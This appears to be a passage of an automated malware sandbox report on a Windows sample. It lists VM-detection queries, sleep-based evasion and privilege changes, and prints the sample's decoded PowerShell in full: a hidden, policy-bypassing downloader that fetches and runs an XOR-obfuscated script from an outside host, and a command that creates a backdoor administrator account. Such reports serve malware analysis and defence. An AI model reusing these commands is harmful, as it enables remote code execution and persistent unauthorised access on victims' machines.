Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Source: C:\Windows\Temp\svczHost.exe	Memory allocated: 252B3570000 memory reserve \| memory write watch
Source: C:\Windows\Temp\myRdpService.exe	Memory allocated: 19CFF4D0000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9910	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9875	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9913	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9881
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9838

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep count: 9875 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4328	Thread sleep count: 9913 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10004	Thread sleep count: 9843 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10184	Thread sleep count: 9836 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10172	Thread sleep count: 35 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228	Thread sleep count: 9874 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9556	Thread sleep count: 9881 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168	Thread sleep count: 9838 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072	Thread sleep count: 55 > 30

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Temp\myRdpService.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: svczHost.exe, 00000010.00000002.4402715368.00000252B6C00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: eMun`@QeMuj`@
Source: powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000005.00000002.3076742691.0000015B6D76D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTLISTr
Source: powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: powershell.exe, 00000009.00000002.4160136439.000001BD75B4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWaQ%SystemRoot%\system32\mswsock.dllKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUw
Source: svczHost.exe, 00000010.00000002.4402715368.00000252B6C00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: HqEMu
Source: powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svczHost.exe, 00000010.00000002.4402715368.00000252B6C00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: FMuVU@DEMuRU@lEMunU@qEMujU@-EMufU@
Source: powershell.exe, 00000001.00000002.3173386732.000001C8390DE000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4400636917.00000252B35E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBh